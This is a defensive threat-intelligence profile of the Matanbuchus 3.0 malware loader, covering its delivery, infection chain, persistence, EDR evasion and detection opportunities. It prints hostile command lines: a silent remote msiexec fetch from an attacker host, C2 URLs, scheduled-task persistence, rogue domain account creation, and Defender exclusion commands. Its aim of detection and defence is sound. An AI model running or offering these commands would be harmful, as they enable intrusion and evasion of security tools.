Matanbuchus - ShroudCloud

# Matanbuchus 3.0 **Type:** Malware Loader / Malware-as-a-Service (MaaS) **Also tracked as:** BelialDemon (developer), Win32.Backdoor.Matanbuchus (detection name) **First observed:** February 2021 (v1 advertised by BelialDemon at $2,500/mo). Version 3.0 complete rewrite observed July 2025. **Status:** Active - premium-tier loader at $10K/mo (HTTPS) / $15K/mo (DNS variant). Returned from mid-2025 hiatus with v3.0 rewrite. Active campaigns as of Feb 2026. Price point filters for funded RaaS affiliates, not commodity operators. --- ## Threat Overview Matanbuchus is a C++ loader sold as MaaS by a developer known as BelialDemon (also behind TriumphLoader). Version 3.0 is a ground-up rewrite featuring Protobuf-serialized C2, ChaCha20 encryption, Heaven's Gate WoW64 bypass, and dual DLL sideloading chains. At $10-15K/month, this is 3-5x the cost of midmarket loaders - the price point means its customer base is smaller but better-funded (established RaaS affiliates, not commodity actors). What makes Matanbuchus operationally distinct: it doesn't just drop a payload and die. It enumerates 70+ EDR products, reports findings to the operator, and the operator selects the execution method based on what's installed. The loader is the recon tool. This means the payload delivery is adaptive - same loader, different execution path depending on your stack. That's harder to write static detections for than a loader that always does the same thing. Historically delivered Cobalt Strike, Rhadamanthys stealer, NetSupport RAT. Current campaigns deliver **AstarionRAT** (24-command RAT, previously undocumented until Huntress disclosure Feb 2026). | Field | Value | |---|---| | Developer | BelialDemon (Russian-speaking forums) | | Pricing | $10,000/mo (HTTPS), $15,000/mo (DNS) | | Payload formats | EXE, DLL, MSI, shellcode, PowerShell, CMD, WMI | | C2 protocol | Protobuf over HTTPS, ChaCha20 encrypted, 14 command types | | Persistence | Scheduled task `Update Tracker Task` via `msiexec -z` | | EDR awareness | Scans for 70+ EDR products, reports to C2 before payload selection | | Anti-analysis | Heaven's Gate (32→64 bit), ChaCha20 brute-force decryption, MurmurHash3 API resolution, busy-loop sandbox evasion, hardcoded expiration date | | Downstream payloads | AstarionRAT, Cobalt Strike, Rhadamanthys, NetSupport RAT, ransomware (unspecified) | --- ## Activity Standing Mid-tier by volume, high-tier by sophistication. Matanbuchus went quiet mid-2025 then returned with a complete v3.0 rewrite advertised July 7, 2025. Active campaigns confirmed through Feb 2026. Not a mass-distribution loader - the price point ($10-15K/mo) limits the customer base to operators who can afford it and expect ROI, which means RaaS affiliates with established access pipelines. Two distinct delivery campaigns documented in 2025-2026: 1. **ClickFix social engineering** → silent MSI → dual sideloading → AstarionRAT (Huntress, Feb 2026) 2. **Microsoft Teams impersonation** → Quick Assist abuse → GUP.exe/Notepad++ sideloading (Morphisec, Jul 2025) The Teams vector is notable - this is vishing (voice phishing via Teams call), not email. If your security awareness training only covers email phishing, your users aren't prepared for this. --- ## Delivery Method **Primary: ClickFix social engineering** - user is lured to a page that instructs them to copy-paste a command into Run dialog or terminal. The command invokes `msiexec.exe` with a remote HTTP URL and `/q` (silent) flag. **Secondary: Microsoft Teams vishing** - attacker calls via Teams impersonating IT helpdesk, convinces user to open Quick Assist, then instructs them to execute a script that downloads the loader MSI. **Tertiary: Phishing email** - traditional attachment/link delivery (historical, less common in v3.0 campaigns). All vectors converge on the same endpoint: a silently installed MSI package that drops the sideloading chain. --- ## Delivers To | Payload | Type | Confidence | |---|---|---| | AstarionRAT | RAT (24 commands, SOCKS5, port scan, cred theft, reflective loading) | HIGH - observed in Huntress IR | | Cobalt Strike | C2 framework | HIGH - historical campaigns | | Rhadamanthys | Infostealer | HIGH - observed by Unit 42 | | NetSupport RAT | Remote access tool | MEDIUM - older campaigns | | Ransomware (unspecified) | RaaS payload | MEDIUM - Huntress assessed ransomware trajectory based on operator behavior, disrupted before deployment | --- ## Infection Chain ### Step 1 - Social Engineering + Silent MSI T1204.002, T1218.007 | Operator ClickFix lure tricks user into executing `mSiexeC.EXe -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q` - mixed casing evades string matching, path traversal collapses, `/q` runs silent. MSI drops: `aps.exe` (renamed 7-Zip), `core.exe` (Zillya! AVCore.exe), `SystemStatus.dll` (Matanbuchus), `INFO` (encrypted shellcode), runtime DLLs. Teams variant uses Quick Assist to install MSI containing `HRUpdate.exe` + sideloaded downloader DLL. > **Detection Opportunity:** Monitor for `msiexec.exe` invocations with remote HTTP/HTTPS URLs combined with the `/q` (silent) flag. Legitimate remote silent MSI installs are rare in most enterprises - this is high-signal, low false-positive. ### Step 2 - DLL Sideloading Stage 1 (Zillya! AV) T1574.002 | Malware `core.exe` (legitimate Zillya! AVCore.exe) loads `SystemStatus.dll` (Matanbuchus 3.0) from `%APPDATA%`. The AV binary is signed and trusted - sideloading through it bypasses application whitelisting and some EDR policies that trust signed AV vendor binaries. > **Detection Opportunity:** Alert on known AV vendor binaries executing from user-writable paths (`%APPDATA%`, `%TEMP%`, `%ProgramData%`) rather than their standard installation directories. A signed AV binary in a temp folder is almost always a sideloading vehicle. ### Step 3 - ChaCha20 Brute-Force + Heaven's Gate T1027, T1055 | Malware Matanbuchus reads `INFO` file (8,624 bytes), brute-forces ChaCha20 decryption starting at counter 99999999 (key = 8-byte ASCII counter + 24-byte hardcoded suffix, nonce = 12 bytes XOR'd with `0x5A`), validates against 21-byte Heaven's Gate shellcode prologue. Shellcode transitions 32→64 bit via far return to segment `0x33`, bypassing WoW64 EDR hooks. Downloads main module from `hxxps://marle[.]io/check/updprofile.aspx` - response starts with magic `0xDEADBEEF`, decrypted in 8KB ChaCha20 chunks. > **Detection Opportunity:** Heaven's Gate detection requires monitoring for cross-architecture transitions (32-bit process executing 64-bit code via segment `0x33` far return). Kernel-level telemetry or ETW providers tracking WoW64 transitions are the best detection surface here. Userland hooks are explicitly bypassed by this technique. ### Step 4 - DLL Sideloading Stage 2 (Java) T1574.002 | Malware Drops to `%TEMP%\ndvyxgdriggmarrf\`: legitimate `java.exe`, malicious `jli.dll`, encrypted Lua script `SySUpd`. `java.exe` loads `jli.dll` (normally Java Launch Interface) - contains embedded Lua 5.4.7 interpreter + custom reflective PE loader. Final payload: AstarionRAT. > **Detection Opportunity:** Monitor for `java.exe` or `javaw.exe` executing from `%TEMP%` or `%APPDATA%` paths, especially on systems with no JRE installed. A Java binary in a temp directory loading an unsigned DLL is a strong sideloading indicator. ### Step 5 - C2 Registration + EDR Enumeration T1071.001, T1518.001 | Malware Main module registers with C2 via Protobuf-over-HTTPS (ChaCha20 encrypted, 32-byte key + 12-byte nonce prepended). Transmits: hostname, username, Windows version, domain, installed EDR products (checks for Defender, CrowdStrike, SentinelOne, Sophos, Trellix, Cortex XDR, Bitdefender), admin status, architecture, campaign/bot IDs. C2 traffic masquerades as Skype Desktop application. Operator receives EDR inventory and selects execution method accordingly. > **Detection Opportunity:** Matanbuchus performs EDR enumeration entirely in-process via a decrypted string table - not through command-line tools like `findstr` or `wmic`. Traditional command-line monitoring will not catch this. Detection depends on monitoring for process enumeration API calls or identifying the C2 callback pattern (Protobuf-over-HTTPS with Skype Desktop user-agent from a non-Skype process). ### Step 6 - Persistence T1053.005 | Malware Creates scheduled task `Update Tracker Task` via: `%WINDIR%\SysWOW64\msiexec.exe -z %Matanbuchus_path%`. Directory name derived from volume serial number. Per-host mutex (prefix `sync`). Registry key at `HKCU\SOFTWARE\%volume_serial_ID%` tracks registration. > **Detection Opportunity:** Monitor for scheduled task creation where the action invokes `msiexec.exe` with the `-z` flag. The `-z` flag is rarely used legitimately and serves here as the persistence callback mechanism. Also look for `msiexec.exe` executing with `-z` from `SysWOW64` as a standalone behavioral indicator. ### Step 7 - Payload Delivery (AstarionRAT) T1105 | Malware AstarionRAT deployed via reflective PE loading from Lua interpreter. 24 commands: shell exec, SOCKS5 proxy, port scanning, credential theft, reflective code loading, file operations. C2 uses RSA encryption disguised as application telemetry - hard to distinguish from legitimate HTTPS app traffic at the network layer. > **Detection Opportunity:** AstarionRAT is newly documented with no widely available signatures. Behavioral detection is the primary surface: watch for SOCKS5 proxy establishment, reflective PE loading from scripting interpreters (Lua), and anomalous outbound connections from processes spawned by `java.exe` in temp directories. ### Step 8 - Lateral Movement (Operator) T1021.002, T1570 | Operator Next-day return. PsExec to Windows Server → DC1 → DC2 in ~40 minutes. Created rogue domain accounts. Staged Defender exclusions (`Set-MpPreference -ExclusionPath`). Installed under fake vendor names in `%APPDATA%`: `AegisLynx Cybernetics Ltd`, `DocuRay Technologies S.r.l`, `HelixShield Technologies ApS`. Staging directory: `C:\ProgramData\USOShared\` (mimics Windows Update). > **Detection Opportunity:** Multiple high-signal behaviors in this phase: PsExec-based lateral movement to domain controllers, creation of new domain accounts via `net user /add /domain`, `Set-MpPreference -ExclusionPath` to tamper with Defender, and files written to `C:\ProgramData\USOShared\` by non-Windows Update processes. Each of these is individually detectable; in combination, they represent a clear hands-on-keyboard intrusion. > > See rule: [[edr-win-def-defender-tampering]] --- ## Raw Command Lines **Initial access (ClickFix)** ``` "C:\WINDOWS\system32\mSiexeC.EXe" -PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q ``` **Persistence** ``` %WINDIR%\SysWOW64\msiexec.exe -z %Matanbuchus_path% schtasks /create /tn "Update Tracker Task" /tr "msiexec.exe -z <path>" /sc onlogon ``` **C2 download (main module)** ``` hxxps://marle[.]io/check/updprofile.aspx hxxps://mechiraz[.]com/cart/checkout/files/update_info.aspx ``` **EDR enumeration (in-process, not cmdline)** ``` Scans for: MsMpEng.exe, CSFalcon*, SentinelAgent*, SophosSAU*, xagt.exe, cortex*, bdservicehost* ``` **Lateral movement (operator hands-on-keyboard)** ``` psexec.exe \\<SERVER> -s cmd.exe /c <COMMAND> net user <rogue_account> <password> /add /domain net localgroup administrators <rogue_account> /add Set-MpPreference -ExclusionPath "C:\ProgramData\USOShared\" ``` **Staging paths** ``` C:\ProgramData\USOShared\ %APPDATA%\AegisLynx Cybernetics Ltd\AegisLynx Threat Fabric\AVU\ %APPDATA%\DocuRay Technologies S.r.l\DocuRay PDF Professional\ZAVY\ %APPDATA%\HelixShield Technologies ApS\HelixShield Adaptive Security\APS\ZAV\ ``` --- ## Detection Opportunities Summary The following behavioral indicators provide the highest-signal detection surfaces across this chain: 1. **Remote silent MSI install** - `msiexec.exe` with HTTP/HTTPS URL in command line + `/q` silent flag. Rare in legitimate enterprise use. 2. **Signed binary sideloading from user-writable paths** - any signed executable (AV binaries, Java, Notepad++ updater) loading unsigned DLLs from `%APPDATA%`, `%TEMP%`, or `%ProgramData%`. This is a TTP-level detection that catches Matanbuchus and any future sideloading chain using legitimate binaries as vehicles. 3. **`msiexec.exe -z` execution** - the `-z` flag is rarely used legitimately and indicates DLL loading via msiexec, used here for persistence. 4. **Files in `C:\ProgramData\USOShared\`** written by non-Windows Update processes - attackers mimic the Windows Update staging directory. 5. **GUP.exe or Notepad++ updater binaries** executing outside the Notepad++ install directory - sideloading vehicle in the Teams/Quick Assist delivery variant. 6. **Cross-architecture transitions** (32→64 bit via segment `0x33`) - Heaven's Gate bypass of WoW64 hooks, detectable at kernel level. --- ## Intelligence Gaps - **AstarionRAT C2 protocol underdocumented** - RSA-encrypted, disguised as app telemetry - but no pcap-level detail, beaconing intervals, or jitter config. Network detection may be near-zero if it blends with legitimate HTTPS. - **Matanbuchus customer base unknown** - $10-15K/mo pricing implies small but funded operator pool. Which RaaS programs overlap with Matanbuchus customers would narrow predicted impact phase - that data sits in closed-source intel. - **AstarionRAT prevalence** - Bespoke for one operator or being sold? If sold, expect rapid proliferation. No data either way. - **DNS variant ($15K/mo) undocumented** - Stealthier than HTTPS variant per advertisement. No public technical analysis of DNS-based C2 protocol. - **Initial delivery vector for ClickFix lures unclear** - Email? Malvertising? SEO poisoning? Different vector = different prevention control. --- ## Confidence Assessment | Claim | Confidence | Evidence | Flips if... | |---|---|---|---| | ClickFix → Matanbuchus → AstarionRAT is active ITW | HIGH | Huntress IR, direct forensic observation | Nothing - observed fact | | Operator trajectory was ransomware | MEDIUM | DC targeting + Defender exclusions + rogue accounts | AstarionRAT is espionage-oriented (exfil-heavy, no encryption) | | Heaven's Gate bypasses EDR userland hooks | MEDIUM | Technique documented; depends on EDR kernel coverage | EDR has kernel callbacks for cross-arch transitions | | BelialDemon is sole developer | MEDIUM | Consistent forum persona since 2021, TriumphLoader lineage | Multiple developers behind same persona | | $10-15K pricing filters for funded operators | HIGH | Price point 3-5x midmarket loaders | Discounts, trial access, or partnership deals we don't see | --- ## Detections Sigma rules applicable to this threat: | Rule ID | Description | | ---------------------------------- | ----------------------------------------- | | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | | [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment | --- ## Key Publications 1. [Huntress - ClickFix → Matanbuchus → AstarionRAT Analysis](https://www.huntress.com/blog/clickfix-matanbuchus-astarionrat-analysis) (Feb 2026) 2. [Zscaler ThreatLabz - Technical Analysis of Matanbuchus 3.0](https://www.zscaler.com/blogs/security-research/technical-analysis-matanbuchus-3-0) (2025) 3. [Morphisec - Matanbuchus 3.0 MaaS Levels Up](https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/) (Jul 2025) 4. [Unit 42 - Matanbuchus: Malware-as-a-Service with Demonic Intentions](https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/) (2022) 5. [CyberArk - Inside Matanbuchus: A Quirky Loader](https://www.cyberark.com/resources/threat-research-blog/inside-matanbuchus-a-quirky-loader) (2022) 6. [Cyble - Matanbuchus Loader Resurfaces](https://cyble.com/blog/matanbuchus-loader-resurfaces/) (2025) 7. [CYFIRMA - Matanbuchus Loader Report](https://www.cyfirma.com/research/matanbuchus-loader-report/) (2025)